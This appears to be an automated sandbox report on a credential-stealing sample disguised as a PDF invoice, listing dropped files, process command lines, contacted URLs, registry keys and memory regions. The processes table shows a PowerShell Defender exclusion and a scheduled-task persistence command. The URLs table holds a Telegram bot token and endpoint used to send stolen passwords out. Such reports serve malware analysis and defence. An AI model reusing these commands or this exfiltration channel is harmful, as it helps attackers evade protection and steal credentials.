Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
BEPZA MT103 Credit.pdf.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\BEPZA MT103 Credit.pdf.exe.log
|
ASCII text, with CRLF line terminators
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Temp\tmp3E23.tmp
|
XML 1.0 document, ASCII text
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe:Zone.Identifier
|
ASCII text, with CRLF line terminators
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\YEGIgzyAhkvT.exe.log
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bq5uo5pt.0bn.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d1x1vlis.wrs.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ez5ghydv.0ae.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r3npyula.sw0.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\tmp4900.tmp
|
XML 1.0 document, ASCII text
|
dropped
|
There are 2 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe
|
"C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe"
|
|
|
|
C:\Windows\SysWOW64\schtasks.exe
|
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YEGIgzyAhkvT" /XML "C:\Users\user\AppData\Local\Temp\tmp3E23.tmp"
|
|
|
|
C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe
|
"C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe"
|
|
|
|
C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe
|
C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe
|
|
|
|
C:\Windows\SysWOW64\schtasks.exe
|
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YEGIgzyAhkvT" /XML "C:\Users\user\AppData\Local\Temp\tmp4900.tmp"
|
|
|
|
C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe
|
"C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe"
|
|
|
|
C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe
|
"C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\wbem\WmiPrvSE.exe
|
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 2 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://checkip.dyndns.org/
|
132.226.247.73
|
||
|
http://crl.m1
|
unknown
|
||
|
https://api.telegram.org
|
unknown
|
||
|
https://api.telegram.org/bot
|
unknown
|
||
|
http://checkip.dyndns.comd
|
unknown
|
||
|
https://api.telegram.org/bot7637203109:AAEwF0h434NduLaTadsXsSgHvM5K6b5snDs/sendDocument?chat_id=7135
|
unknown
|
||
|
http://checkip.dyndns.org/q
|
unknown
|
||
|
http://reallyfreegeoip.orgd
|
unknown
|
||
|
https://reallyfreegeoip.org/xml/89.187.171.161
|
104.21.80.1
|
||
|
http://reallyfreegeoip.org
|
unknown
|
||
|
http://checkip.dyndns.orgd
|
unknown
|
||
|
https://reallyfreegeoip.org
|
unknown
|
||
|
https://api.telegram.org/bot7637203109:AAEwF0h434NduLaTadsXsSgHvM5K6b5snDs/sendDocument?chat_id=7135428463&caption=user%20/%20Passwords%20/%2089.187.171.161
|
149.154.167.220
|
||
|
http://api.telegram.orgd
|
unknown
|
||
|
http://checkip.dyndns.org
|
unknown
|
||
|
http://checkip.dyndns.com
|
unknown
|
||
|
https://reallyfreegeoip.org/xml/89.187.171.161d
|
unknown
|
||
|
http://api.telegram.org
|
unknown
|
||
|
http://checkip.dyndns.org/d
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://api.telegram.org/bot-/sendDocument?chat_id=
|
unknown
|
||
|
https://reallyfreegeoip.org/xml/89.187.171.161l
|
unknown
|
||
|
https://reallyfreegeoip.org/xml/
|
unknown
|
There are 13 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
reallyfreegeoip.org
|
104.21.80.1
|
||
|
api.telegram.org
|
149.154.167.220
|
||
|
checkip.dyndns.com
|
132.226.247.73
|
||
|
checkip.dyndns.org
|
unknown
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
149.154.167.220
|
api.telegram.org
|
United Kingdom
|
||
|
104.21.80.1
|
reallyfreegeoip.org
|
United States
|
||
|
132.226.247.73
|
checkip.dyndns.com
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\BEPZA MT103 Credit_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\BEPZA MT103 Credit_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\BEPZA MT103 Credit_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\BEPZA MT103 Credit_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\BEPZA MT103 Credit_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\BEPZA MT103 Credit_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\BEPZA MT103 Credit_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\BEPZA MT103 Credit_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\BEPZA MT103 Credit_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\BEPZA MT103 Credit_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\BEPZA MT103 Credit_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\BEPZA MT103 Credit_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\BEPZA MT103 Credit_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\BEPZA MT103 Credit_RASMANCS
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\YEGIgzyAhkvT_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\YEGIgzyAhkvT_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\YEGIgzyAhkvT_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\YEGIgzyAhkvT_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\YEGIgzyAhkvT_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\YEGIgzyAhkvT_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\YEGIgzyAhkvT_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\YEGIgzyAhkvT_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\YEGIgzyAhkvT_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\YEGIgzyAhkvT_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\YEGIgzyAhkvT_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\YEGIgzyAhkvT_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\YEGIgzyAhkvT_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\YEGIgzyAhkvT_RASMANCS
|
FileDirectory
|
There are 19 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
413000
|
remote allocation
|
page execute and read and write
|
|
|
|
40E000
|
remote allocation
|
page execute and read and write
|
|
|
|
2EC4000
|
trusted library allocation
|
page read and write
|
|
|
|
2E44000
|
trusted library allocation
|
page read and write
|
|
|
|
40F9000
|
trusted library allocation
|
page read and write
|
|
|
|
2BEA000
|
trusted library allocation
|
page read and write
|
||
|
5390000
|
trusted library allocation
|
page read and write
|
||
|
3EEA000
|
trusted library allocation
|
page read and write
|
||
|
5450000
|
heap
|
page execute and read and write
|
||
|
51D0000
|
trusted library allocation
|
page read and write
|
||
|
51E6000
|
trusted library allocation
|
page read and write
|
||
|
5990000
|
heap
|
page read and write
|
||
|
58BE000
|
stack
|
page read and write
|
||
|
13CD000
|
trusted library allocation
|
page execute and read and write
|
||
|
77B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
5650000
|
trusted library allocation
|
page read and write
|
||
|
2DEE000
|
trusted library allocation
|
page read and write
|
||
|
1370000
|
trusted library allocation
|
page read and write
|
||
|
2DF0000
|
trusted library allocation
|
page read and write
|
||
|
FB0000
|
heap
|
page read and write
|
||
|
658A000
|
trusted library allocation
|
page read and write
|
||
|
5224000
|
trusted library allocation
|
page read and write
|
||
|
FB8000
|
heap
|
page read and write
|
||
|
1200000
|
trusted library allocation
|
page read and write
|
||
|
B5E000
|
unkown
|
page read and write
|
||
|
1890000
|
trusted library allocation
|
page read and write
|
||
|
8AA000
|
heap
|
page read and write
|
||
|
2E71000
|
trusted library allocation
|
page read and write
|
||
|
2AE0000
|
trusted library allocation
|
page read and write
|
||
|
5650000
|
trusted library allocation
|
page execute and read and write
|
||
|
11F4000
|
trusted library allocation
|
page read and write
|
||
|
B9F000
|
unkown
|
page read and write
|
||
|
5212000
|
trusted library allocation
|
page read and write
|
||
|
B520000
|
heap
|
page read and write
|
||
|
2C50000
|
heap
|
page execute and read and write
|
||
|
77C0000
|
trusted library allocation
|
page read and write
|
||
|
747C000
|
trusted library allocation
|
page read and write
|
||
|
13E7000
|
trusted library allocation
|
page execute and read and write
|
||
|
2DD4000
|
trusted library allocation
|
page read and write
|
||
|
1095000
|
heap
|
page read and write
|
||
|
6554000
|
trusted library allocation
|
page read and write
|
||
|
3236000
|
trusted library allocation
|
page read and write
|
||
|
1400000
|
heap
|
page read and write
|
||
|
5200000
|
heap
|
page read and write
|
||
|
125E000
|
stack
|
page read and write
|
||
|
13AD000
|
trusted library allocation
|
page execute and read and write
|
||
|
7A0F000
|
stack
|
page read and write
|
||
|
6560000
|
trusted library allocation
|
page execute and read and write
|
||
|
2DFB000
|
heap
|
page read and write
|
||
|
578E000
|
stack
|
page read and write
|
||
|
53D0000
|
heap
|
page read and write
|
||
|
1060000
|
heap
|
page read and write
|
||
|
783A000
|
heap
|
page read and write
|
||
|
6450000
|
heap
|
page read and write
|
||
|
5210000
|
trusted library allocation
|
page read and write
|
||
|
7470000
|
trusted library allocation
|
page read and write
|
||
|
5206000
|
trusted library allocation
|
page read and write
|
||
|
A20000
|
heap
|
page read and write
|
||
|
7B4E000
|
stack
|
page read and write
|
||
|
51F2000
|
trusted library allocation
|
page read and write
|
||
|
6550000
|
trusted library allocation
|
page read and write
|
||
|
1210000
|
trusted library allocation
|
page read and write
|
||
|
596E000
|
stack
|
page read and write
|
||
|
2D71000
|
trusted library allocation
|
page read and write
|
||
|
3DC9000
|
trusted library allocation
|
page read and write
|
||
|
67CD000
|
stack
|
page read and write
|
||
|
2E4E000
|
trusted library allocation
|
page read and write
|
||
|
3DDF000
|
trusted library allocation
|
page read and write
|
||
|
40B000
|
remote allocation
|
page execute and read and write
|
||
|
2EDB000
|
trusted library allocation
|
page read and write
|
||
|
5970000
|
trusted library section
|
page readonly
|
||
|
5260000
|
trusted library allocation
|
page read and write
|
||
|
5630000
|
heap
|
page read and write
|
||
|
5212000
|
trusted library allocation
|
page read and write
|
||
|
7815000
|
heap
|
page read and write
|
||
|
51EB000
|
trusted library allocation
|
page read and write
|
||
|
1250000
|
trusted library allocation
|
page read and write
|
||
|
657E000
|
stack
|
page read and write
|
||
|
520D000
|
trusted library allocation
|
page read and write
|
||
|
2F00000
|
heap
|
page read and write
|
||
|
10A8000
|
heap
|
page read and write
|
||
|
12A0000
|
trusted library allocation
|
page read and write
|
||
|
57B0000
|
heap
|
page read and write
|
||
|
6586000
|
trusted library allocation
|
page read and write
|
||
|
121D000
|
trusted library allocation
|
page execute and read and write
|
||
|
13D2000
|
trusted library allocation
|
page read and write
|
||
|
1274000
|
trusted library allocation
|
page read and write
|
||
|
13E2000
|
trusted library allocation
|
page read and write
|
||
|
7890000
|
trusted library allocation
|
page read and write
|
||
|
680E000
|
stack
|
page read and write
|
||
|
684E000
|
stack
|
page read and write
|
||
|
6D7E000
|
stack
|
page read and write
|
||
|
2C30000
|
trusted library allocation
|
page read and write
|
||
|
2BF6000
|
trusted library allocation
|
page read and write
|
||
|
6950000
|
trusted library allocation
|
page read and write
|
||
|
5266000
|
trusted library allocation
|
page read and write
|
||
|
780D000
|
heap
|
page read and write
|
||
|
58EE000
|
stack
|
page read and write
|
||
|
F10000
|
heap
|
page read and write
|
||
|
8160000
|
trusted library section
|
page read and write
|
||
|
634E000
|
stack
|
page read and write
|
||
|
649B000
|
heap
|
page read and write
|
||
|
2E6C000
|
trusted library allocation
|
page read and write
|
||
|
C3A000
|
stack
|
page read and write
|
||
|
13CE000
|
trusted library allocation
|
page read and write
|
||
|
699F000
|
stack
|
page read and write
|
||
|
3DC1000
|
trusted library allocation
|
page read and write
|
||
|
D30000
|
unkown
|
page readonly
|
||
|
1087000
|
heap
|
page read and write
|
||
|
13D6000
|
trusted library allocation
|
page execute and read and write
|
||
|
107A000
|
stack
|
page read and write
|
||
|
75DE000
|
stack
|
page read and write
|
||
|
593B000
|
trusted library allocation
|
page read and write
|
||
|
57B5000
|
heap
|
page read and write
|
||
|
1079000
|
heap
|
page read and write
|
||
|
11FD000
|
trusted library allocation
|
page execute and read and write
|
||
|
5BC0000
|
heap
|
page read and write
|
||
|
7370000
|
heap
|
page read and write
|
||
|
2FC0000
|
trusted library allocation
|
page read and write
|
||
|
6560000
|
trusted library allocation
|
page execute and read and write
|
||
|
55B0000
|
trusted library allocation
|
page read and write
|
||
|
5264000
|
trusted library allocation
|
page read and write
|
||
|
522C000
|
stack
|
page read and write
|
||
|
5BD0000
|
trusted library allocation
|
page read and write
|
||
|
2B4E000
|
stack
|
page read and write
|
||
|
1177000
|
stack
|
page read and write
|
||
|
11F3000
|
trusted library allocation
|
page execute and read and write
|
||
|
77D0000
|
heap
|
page read and write
|
||
|
5940000
|
trusted library allocation
|
page execute and read and write
|
||
|
5630000
|
trusted library allocation
|
page execute and read and write
|
||
|
7D8E000
|
stack
|
page read and write
|
||
|
3D8B000
|
trusted library allocation
|
page read and write
|
||
|
2BDB000
|
trusted library allocation
|
page read and write
|
||
|
2F19000
|
trusted library allocation
|
page read and write
|
||
|
1390000
|
trusted library allocation
|
page read and write
|
||
|
7790000
|
trusted library section
|
page read and write
|
||
|
131E000
|
stack
|
page read and write
|
||
|
EFE000
|
stack
|
page read and write
|
||
|
13C0000
|
trusted library allocation
|
page read and write
|
||
|
685E000
|
stack
|
page read and write
|
||
|
AD9000
|
stack
|
page read and write
|
||
|
5270000
|
trusted library allocation
|
page execute and read and write
|
||
|
E70000
|
heap
|
page read and write
|
||
|
13DA000
|
trusted library allocation
|
page execute and read and write
|
||
|
5230000
|
trusted library allocation
|
page read and write
|
||
|
2DF0000
|
heap
|
page read and write
|
||
|
13E0000
|
trusted library allocation
|
page read and write
|
||
|
5B3D000
|
stack
|
page read and write
|
||
|
2AE7000
|
trusted library allocation
|
page execute and read and write
|
||
|
2D52000
|
trusted library allocation
|
page read and write
|
||
|
2E8D000
|
trusted library allocation
|
page read and write
|
||
|
2D6F000
|
stack
|
page read and write
|
||
|
13A0000
|
heap
|
page execute and read and write
|
||
|
7C40000
|
trusted library allocation
|
page read and write
|
||
|
7880000
|
trusted library allocation
|
page execute and read and write
|
||
|
55F0000
|
trusted library allocation
|
page read and write
|
||
|
F6E000
|
stack
|
page read and write
|
||
|
644F000
|
stack
|
page read and write
|
||
|
840000
|
heap
|
page read and write
|
||
|
2F5B000
|
trusted library allocation
|
page read and write
|
||
|
2BB4000
|
trusted library allocation
|
page read and write
|
||
|
12D0000
|
trusted library allocation
|
page read and write
|
||
|
13B0000
|
trusted library allocation
|
page read and write
|
||
|
112E000
|
stack
|
page read and write
|
||
|
2E07000
|
trusted library allocation
|
page read and write
|
||
|
6590000
|
heap
|
page read and write
|
||
|
2FD0000
|
trusted library allocation
|
page read and write
|
||
|
7382000
|
heap
|
page read and write
|
||
|
2AD2000
|
trusted library allocation
|
page read and write
|
||
|
2E09000
|
trusted library allocation
|
page read and write
|
||
|
2AD6000
|
trusted library allocation
|
page execute and read and write
|
||
|
689E000
|
stack
|
page read and write
|
||
|
6D9E000
|
stack
|
page read and write
|
||
|
412000
|
remote allocation
|
page execute and read and write
|
||
|
1428000
|
heap
|
page read and write
|
||
|
13B0000
|
heap
|
page read and write
|
||
|
1226000
|
trusted library allocation
|
page execute and read and write
|
||
|
D37000
|
stack
|
page read and write
|
||
|
1235000
|
trusted library allocation
|
page execute and read and write
|
||
|
1204000
|
trusted library allocation
|
page read and write
|
||
|
2D96000
|
trusted library allocation
|
page read and write
|
||
|
6D10000
|
heap
|
page read and write
|
||
|
DE2000
|
unkown
|
page readonly
|
||
|
3E5A000
|
trusted library allocation
|
page read and write
|
||
|
6557000
|
trusted library allocation
|
page read and write
|
||
|
123B000
|
trusted library allocation
|
page execute and read and write
|
||
|
65C9000
|
trusted library allocation
|
page read and write
|
||
|
5259000
|
trusted library allocation
|
page read and write
|
||
|
B50F000
|
stack
|
page read and write
|
||
|
13A0000
|
heap
|
page read and write
|
||
|
5220000
|
trusted library allocation
|
page read and write
|
||
|
106E000
|
heap
|
page read and write
|
||
|
637E000
|
stack
|
page read and write
|
||
|
2EFE000
|
stack
|
page read and write
|
||
|
D32000
|
unkown
|
page readonly
|
||
|
120D000
|
trusted library allocation
|
page execute and read and write
|
||
|
1230000
|
trusted library allocation
|
page read and write
|
||
|
FF7000
|
heap
|
page read and write
|
||
|
2CDD000
|
stack
|
page read and write
|
||
|
2AD0000
|
trusted library allocation
|
page read and write
|
||
|
5C00000
|
trusted library allocation
|
page execute and read and write
|
||
|
30EE000
|
stack
|
page read and write
|
||
|
140E000
|
heap
|
page read and write
|
||
|
2E13000
|
trusted library allocation
|
page read and write
|
||
|
2B90000
|
heap
|
page execute and read and write
|
||
|
1273000
|
trusted library allocation
|
page execute and read and write
|
||
|
BDFE000
|
stack
|
page read and write
|
||
|
558E000
|
trusted library allocation
|
page read and write
|
||
|
64B5000
|
heap
|
page read and write
|
||
|
18A0000
|
heap
|
page read and write
|
||
|
FC7000
|
heap
|
page read and write
|
||
|
2ACD000
|
trusted library allocation
|
page execute and read and write
|
||
|
10A3000
|
heap
|
page read and write
|
||
|
1435000
|
heap
|
page read and write
|
||
|
B79C000
|
stack
|
page read and write
|
||
|
860000
|
heap
|
page read and write
|
||
|
5980000
|
heap
|
page read and write
|
||
|
559D000
|
trusted library allocation
|
page read and write
|
||
|
3DCB000
|
trusted library allocation
|
page read and write
|
||
|
1296000
|
trusted library allocation
|
page execute and read and write
|
||
|
4E8E000
|
stack
|
page read and write
|
||
|
11F0000
|
trusted library allocation
|
page read and write
|
||
|
2D8B000
|
trusted library allocation
|
page read and write
|
||
|
738A000
|
heap
|
page read and write
|
||
|
537C000
|
stack
|
page read and write
|
||
|
512B000
|
stack
|
page read and write
|
||
|
2CF1000
|
trusted library allocation
|
page read and write
|
||
|
14F3000
|
heap
|
page read and write
|
||
|
2BA0000
|
trusted library allocation
|
page read and write
|
||
|
56EE000
|
stack
|
page read and write
|
||
|
40C000
|
remote allocation
|
page execute and read and write
|
||
|
5670000
|
trusted library allocation
|
page execute and read and write
|
||
|
2B90000
|
trusted library allocation
|
page execute and read and write
|
||
|
3E0B000
|
trusted library allocation
|
page read and write
|
||
|
3E2C000
|
trusted library allocation
|
page read and write
|
||
|
F20000
|
heap
|
page read and write
|
||
|
63D000
|
stack
|
page read and write
|
||
|
14E0000
|
heap
|
page read and write
|
||
|
1380000
|
trusted library allocation
|
page read and write
|
||
|
A1F000
|
stack
|
page read and write
|
||
|
F6E000
|
stack
|
page read and write
|
||
|
73C7000
|
heap
|
page read and write
|
||
|
5226000
|
trusted library allocation
|
page read and write
|
||
|
5840000
|
trusted library allocation
|
page execute and read and write
|
||
|
67A000
|
stack
|
page read and write
|
||
|
6570000
|
trusted library allocation
|
page execute and read and write
|
||
|
82FF000
|
stack
|
page read and write
|
||
|
7F6A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2DEC000
|
trusted library allocation
|
page read and write
|
||
|
113E000
|
stack
|
page read and write
|
||
|
5BF5000
|
heap
|
page read and write
|
||
|
790E000
|
stack
|
page read and write
|
||
|
EBE000
|
stack
|
page read and write
|
||
|
10EE000
|
stack
|
page read and write
|
||
|
2E87000
|
trusted library allocation
|
page read and write
|
||
|
2E67000
|
trusted library allocation
|
page read and write
|
||
|
2DD1000
|
trusted library allocation
|
page read and write
|
||
|
E35000
|
heap
|
page read and write
|
||
|
65C0000
|
trusted library allocation
|
page read and write
|
||
|
F50000
|
heap
|
page read and write
|
||
|
5CC0000
|
trusted library allocation
|
page read and write
|
||
|
2DD9000
|
trusted library allocation
|
page read and write
|
||
|
7F0000
|
heap
|
page read and write
|
||
|
2ADA000
|
trusted library allocation
|
page execute and read and write
|
||
|
51E0000
|
trusted library allocation
|
page read and write
|
||
|
3E8F000
|
trusted library allocation
|
page read and write
|
||
|
C0FE000
|
stack
|
page read and write
|
||
|
4EBC000
|
stack
|
page read and write
|
||
|
8520000
|
trusted library allocation
|
page read and write
|
||
|
55C0000
|
trusted library allocation
|
page read and write
|
||
|
74DE000
|
stack
|
page read and write
|
||
|
7C50000
|
trusted library allocation
|
page execute and read and write
|
||
|
BDE000
|
stack
|
page read and write
|
||
|
8A0000
|
heap
|
page read and write
|
||
|
1072000
|
heap
|
page read and write
|
||
|
FCF000
|
heap
|
page read and write
|
||
|
5292000
|
trusted library section
|
page readonly
|
||
|
1037000
|
heap
|
page read and write
|
||
|
634E000
|
stack
|
page read and write
|
||
|
7260000
|
heap
|
page read and write
|
||
|
5591000
|
trusted library allocation
|
page read and write
|
||
|
5500000
|
heap
|
page execute and read and write
|
||
|
1290000
|
trusted library allocation
|
page read and write
|
||
|
53E0000
|
trusted library allocation
|
page read and write
|
||
|
3D71000
|
trusted library allocation
|
page read and write
|
||
|
81FE000
|
stack
|
page read and write
|
||
|
768E000
|
heap
|
page read and write
|
||
|
53BE000
|
stack
|
page read and write
|
||
|
122A000
|
trusted library allocation
|
page execute and read and write
|
||
|
10A4000
|
heap
|
page read and write
|
||
|
2E89000
|
trusted library allocation
|
page read and write
|
||
|
13EB000
|
trusted library allocation
|
page execute and read and write
|
||
|
2DCE000
|
trusted library allocation
|
page read and write
|
||
|
FE9000
|
heap
|
page read and write
|
||
|
55EE000
|
stack
|
page read and write
|
||
|
5680000
|
heap
|
page read and write
|
||
|
6590000
|
trusted library allocation
|
page execute and read and write
|
||
|
1222000
|
trusted library allocation
|
page read and write
|
||
|
2DC1000
|
trusted library allocation
|
page read and write
|
||
|
13A0000
|
trusted library allocation
|
page read and write
|
||
|
3FA0000
|
trusted library allocation
|
page read and write
|
||
|
2BB0000
|
trusted library allocation
|
page read and write
|
||
|
2DA4000
|
trusted library allocation
|
page read and write
|
||
|
2C9E000
|
stack
|
page read and write
|
||
|
2ABE000
|
stack
|
page read and write
|
||
|
7480000
|
trusted library allocation
|
page execute and read and write
|
||
|
2DA0000
|
trusted library allocation
|
page read and write
|
||
|
135C000
|
stack
|
page read and write
|
||
|
2C3C000
|
trusted library allocation
|
page read and write
|
||
|
1390000
|
trusted library allocation
|
page read and write
|
||
|
2E49000
|
trusted library allocation
|
page read and write
|
||
|
105E000
|
stack
|
page read and write
|
||
|
2D5C000
|
trusted library allocation
|
page read and write
|
||
|
73B8000
|
heap
|
page read and write
|
||
|
7EE000
|
unkown
|
page read and write
|
||
|
3D29000
|
trusted library allocation
|
page read and write
|
||
|
6D50000
|
heap
|
page read and write
|
||
|
16FE000
|
stack
|
page read and write
|
||
|
E30000
|
heap
|
page read and write
|
||
|
52D0000
|
trusted library allocation
|
page read and write
|
||
|
77A0000
|
trusted library allocation
|
page read and write
|
||
|
18A8000
|
heap
|
page read and write
|
||
|
55EF000
|
stack
|
page read and write
|
||
|
1068000
|
heap
|
page read and write
|
||
|
14CB000
|
heap
|
page read and write
|
||
|
6E9F000
|
stack
|
page read and write
|
||
|
66E0000
|
heap
|
page read and write
|
||
|
B510000
|
heap
|
page read and write
|
||
|
2CC8000
|
trusted library allocation
|
page read and write
|
||
|
14B7000
|
heap
|
page read and write
|
||
|
5647000
|
trusted library allocation
|
page read and write
|
||
|
5930000
|
trusted library allocation
|
page read and write
|
||
|
7680000
|
heap
|
page read and write
|
||
|
65B4000
|
heap
|
page read and write
|
||
|
694E000
|
stack
|
page read and write
|
||
|
2E29000
|
trusted library allocation
|
page read and write
|
||
|
F70000
|
heap
|
page read and write
|
||
|
411000
|
remote allocation
|
page execute and read and write
|
||
|
3CF1000
|
trusted library allocation
|
page read and write
|
||
|
79DF000
|
stack
|
page read and write
|
||
|
562E000
|
stack
|
page read and write
|
||
|
2E0B000
|
trusted library allocation
|
page read and write
|
||
|
400000
|
remote allocation
|
page execute and read and write
|
||
|
52E3000
|
heap
|
page read and write
|
||
|
2C39000
|
trusted library allocation
|
page read and write
|
||
|
54F0000
|
trusted library allocation
|
page read and write
|
||
|
1200000
|
heap
|
page read and write
|
||
|
1443000
|
heap
|
page read and write
|
||
|
C1F000
|
stack
|
page read and write
|
||
|
1417000
|
heap
|
page read and write
|
||
|
2D6E000
|
trusted library allocation
|
page read and write
|
||
|
5230000
|
trusted library allocation
|
page read and write
|
||
|
3422000
|
trusted library allocation
|
page read and write
|
||
|
1384000
|
trusted library allocation
|
page read and write
|
||
|
6580000
|
heap
|
page read and write
|
||
|
2BDE000
|
trusted library allocation
|
page read and write
|
||
|
83F000
|
unkown
|
page read and write
|
||
|
40A000
|
remote allocation
|
page execute and read and write
|
||
|
7F350000
|
trusted library allocation
|
page execute and read and write
|
||
|
B89C000
|
stack
|
page read and write
|
||
|
525C000
|
trusted library allocation
|
page read and write
|
||
|
3DAB000
|
trusted library allocation
|
page read and write
|
||
|
53C0000
|
heap
|
page read and write
|
||
|
52E0000
|
heap
|
page read and write
|
||
|
3E70000
|
trusted library allocation
|
page read and write
|
||
|
2CE0000
|
heap
|
page read and write
|
||
|
F55000
|
heap
|
